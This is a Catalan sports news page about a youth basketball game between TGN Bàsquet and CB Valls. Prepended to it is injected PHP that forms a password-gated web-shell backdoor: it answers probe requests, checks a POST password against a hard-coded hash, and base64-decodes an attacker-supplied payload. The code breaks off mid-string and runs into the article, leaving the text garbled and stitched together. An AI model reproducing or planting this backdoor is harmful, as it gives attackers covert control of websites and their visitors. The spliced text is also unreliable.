function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí 06 A remunta deu punts en els dos últims minuts i derrota el CB Valls (68-67) - Tgn Bàsquet Club -

L’infantil masculí 06 A remunta deu punts en els dos últims minuts i derrota el CB Valls (68-67)

Updated: octubre 1, 2019

L’equip infantil masculí 06 A del TGN Bàsquet va derrotar el CB Valls en un partit que va tenir un final d’infart. Els nois que entrena Àlex Garrido van dominar l’inici del matx contra un rival superior físicament però la bona pressió defensiva lila els va permetre recuperar moltes pilotes i sortir al contraatac. En el segon període el Valls va recuperar terreny, aprofitant el joc al pal baix i a partir d’allí creant joc, especialment en els talls de la zona.

Els locals van patir i encara més quan en l’últim quart el desavantatge va arribar a ser de 14 punts. Així, quan faltaven dos minuts per acabar el matx, els vallencs guanyaven per deu punts de diferència. Però el TGN Bàsquet no es va rendir, escurçant les diferències. Una antiesportiva favorable als locals va deixar el resultat en 65-67 i un triple de Neila en l’últim sospir atorgava el triomf al TGN Bàsquet.